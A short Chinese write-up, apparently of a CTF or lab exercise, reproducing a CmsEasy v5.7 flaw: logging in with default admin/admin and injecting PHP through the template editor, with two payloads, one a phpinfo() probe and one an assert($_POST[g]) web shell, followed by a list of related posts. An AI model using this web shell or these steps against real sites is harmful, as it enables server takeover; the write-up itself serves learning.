【Web】CmsEasy 漏洞复现

访问主页

到处点一点没啥发现

扫目录

访问/admin

账号密码都是admin admin,不知道为什么,这里就先当作是默认吧

(其实都是信息检索,能在网上搜到就行hhh)

登录成功

看到左边列表有模板,心里大概有数了哈

进行一波历史漏洞的查

CmsEasy_v5.7 漏洞测试

payload1:

复制代码
1111111111";}<?php phpinfo()?>

payload2:

复制代码
11";}<?php assert($_POST[g]);?>

然而蚁剑连不上

在页面里post传g=phpinfo();可以执行

但p=system('xxx');却不能执行(没有disable_functions)

挺奇怪的,可能不是linux系统?

相关推荐
光影少年8 分钟前
网络安全生态及学习路线
学习·安全·web安全
报错小能手1 小时前
linux学习笔记(51)Redis发布订阅 主从复制 缓存 雪崩
linux·笔记·学习
是Yu欸1 小时前
【仓颉语言】原生智能、全场景与强安全的设计哲学
开发语言·安全·鸿蒙·鸿蒙系统·仓颉语言
酷柚易汛智推官1 小时前
基于MemU的自主代理记忆管理系统:技术解析与实践
java·安全·架构
Cathy Bryant1 小时前
大模型微调(四):人类反馈强化学习(RLHF)
笔记·神经网络·机器学习·数学建模·transformer
不会算法的小灰1 小时前
JavaScript 核心知识学习笔记:给Java开发者的实战指南
javascript·笔记·学习
狡猾大先生1 小时前
ESP32S3-Cam实践(LedStrip、RC舵机控制)
笔记
序^章1 小时前
【CTF | 比赛篇】Newstar ctf web
网络安全·ctf
鸽子一号2 小时前
c#笔记之事件
笔记
Lovely Ruby2 小时前
七日 Go 的自学笔记 (一)
开发语言·笔记·golang